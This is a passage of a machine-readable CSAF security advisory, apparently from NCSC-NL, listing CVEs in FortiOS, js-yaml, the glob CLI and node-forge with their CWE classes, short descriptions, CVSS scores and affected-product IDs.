"text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-62522 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-62522.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-62522"
},
{
"cve": "CVE-2025-64157",
"cwe": {
"id": "CWE-134",
"name": "Use of Externally-Controlled Format String"
},
"notes": [
{
"category": "other",
"text": "Use of Externally-Controlled Format String",
"title": "CWE-134"
},
{
"category": "description",
"text": "Fortinet FortiOS versions 7.0 through 7.6.4, including FortiGate devices, contain a CWE-134 externally-controlled format string vulnerability that allows an authenticated admin to execute unauthorized code or commands via crafted configurations.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64157 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-64157.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-64157"
},
{
"cve": "CVE-2025-64718",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)",
"title": "CWE-1321"
},
{
"category": "other",
"text": "CWE-1035",
"title": "CWE-1035"
},
{
"category": "other",
"text": "CWE-937",
"title": "CWE-937"
},
{
"category": "description",
"text": "Multiple vulnerabilities have been identified in js-yaml, Oracle Communications Unified Assurance, and HPE Telco software, allowing for prototype pollution and unauthorized access, with varying severity and available patches.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64718 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-64718.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-64718"
},
{
"cve": "CVE-2025-64756",
"cwe": {
"id": "CWE-78",
"name": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)"
},
"notes": [
{
"category": "other",
"text": "Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"title": "CWE-78"
},
{
"category": "description",
"text": "The glob CLI has a command injection vulnerability in its `-c/--cmd` option, allowing arbitrary command execution through malicious filenames, which has been patched in versions 10.5.0 and 11.1.0.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-64756 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-64756.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2025-64756"
},
{
"cve": "CVE-2025-66030",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"notes": [
{
"category": "other",
"text": "Integer Overflow or Wraparound",
"title": "CWE-190"
},
{
"category": "description",
"text": "An Integer Overflow vulnerability in node-forge versions up to 1.3.1 allows remote attackers to craft ASN.1 OIDs with oversized arcs that bypass security controls via 32-bit truncation, fixed in version 1.3.2.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-66030 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-66030.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
